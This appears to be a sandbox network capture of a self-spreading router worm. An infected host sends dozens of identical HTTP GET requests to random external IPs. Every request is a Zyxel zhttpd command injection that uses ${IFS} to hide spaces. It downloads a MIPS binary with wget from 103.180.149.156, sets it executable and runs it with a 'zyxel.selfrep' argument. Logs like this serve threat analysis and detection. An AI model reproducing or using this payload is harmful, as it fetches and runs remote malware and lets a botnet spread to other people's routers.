                                            Feb 2, 2024 06:21:23.846699953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7308192.168.2.153842440.48.25.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846736908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7309192.168.2.155098032.224.150.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846775055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7310192.168.2.154687819.135.106.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846831083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7311192.168.2.1544752150.13.200.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846849918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7312192.168.2.1545548165.179.118.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846890926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7313192.168.2.154192035.0.143.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846954107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7314192.168.2.1538668185.142.199.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.846973896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7315192.168.2.153744443.4.250.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847038984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7316192.168.2.1538062121.56.185.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847074986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7317192.168.2.154160412.110.70.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847106934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7318192.168.2.1560362130.67.6.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847150087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7319192.168.2.1533008126.220.148.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847203970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7320192.168.2.1551860194.174.246.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847233057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7321192.168.2.1548784188.112.80.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847266912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7322192.168.2.154683014.173.67.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847316980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7323192.168.2.1543778141.128.36.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847354889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7324192.168.2.1551180174.234.202.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847393036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7325192.168.2.154995652.220.158.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847429991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7326192.168.2.1559170151.74.252.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847484112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7327192.168.2.153370419.195.81.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847532034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7328192.168.2.1555748150.134.244.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847558022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7329192.168.2.154588475.136.133.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847606897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7330192.168.2.1559442197.198.97.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847646952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7331192.168.2.155018451.101.59.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847687006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7332192.168.2.155706038.118.110.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847728968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7333192.168.2.1559400172.13.206.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847779989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7334192.168.2.153883012.219.149.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847824097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7335192.168.2.153584466.185.249.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847875118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7336192.168.2.154204454.200.97.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847917080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7337192.168.2.153305635.218.71.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847954988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7338192.168.2.153674261.74.136.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.847995043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7339192.168.2.1534488207.100.31.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848033905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7340192.168.2.1544998117.187.33.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848074913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7341192.168.2.1542550142.133.254.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848120928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7342192.168.2.154615070.231.135.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848150969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7343192.168.2.1536220163.111.111.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848180056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7344192.168.2.154984676.82.87.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848208904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7345192.168.2.1538078105.37.23.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848263979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7346192.168.2.154496477.147.103.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848306894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7347192.168.2.1545066102.187.83.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848334074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7348192.168.2.1536860140.76.76.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848367929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7349192.168.2.1543032114.153.13.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848423004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7350192.168.2.1554194103.34.234.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848438978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7351192.168.2.155457641.77.249.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848481894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7352192.168.2.1557576194.254.97.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848529100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7353192.168.2.1558324155.50.172.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848562956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7354192.168.2.1550736216.174.178.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848592997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7355192.168.2.1541796119.116.195.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848630905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7356192.168.2.1549176165.187.74.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848670959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7357192.168.2.1540286168.134.77.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848717928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7358192.168.2.1533192205.121.153.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848757029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7359192.168.2.15386245.90.235.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848803997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7360192.168.2.1553320111.68.145.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848841906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7361192.168.2.1547130130.131.211.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848881960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7362192.168.2.154220631.58.68.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848918915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7363192.168.2.1557818142.96.91.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.848965883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7364192.168.2.155003672.253.207.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849006891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7365192.168.2.1549018212.31.144.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849049091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7366192.168.2.154151471.138.165.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849087000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7367192.168.2.1547108173.226.115.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849149942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7368192.168.2.1559406173.245.88.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849184036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7369192.168.2.1551232201.34.45.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849220991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7370192.168.2.1532858117.224.22.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:23.849261999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7371192.168.2.1540032188.108.9.126443
                                            TimestampBytes transferredDirectionData
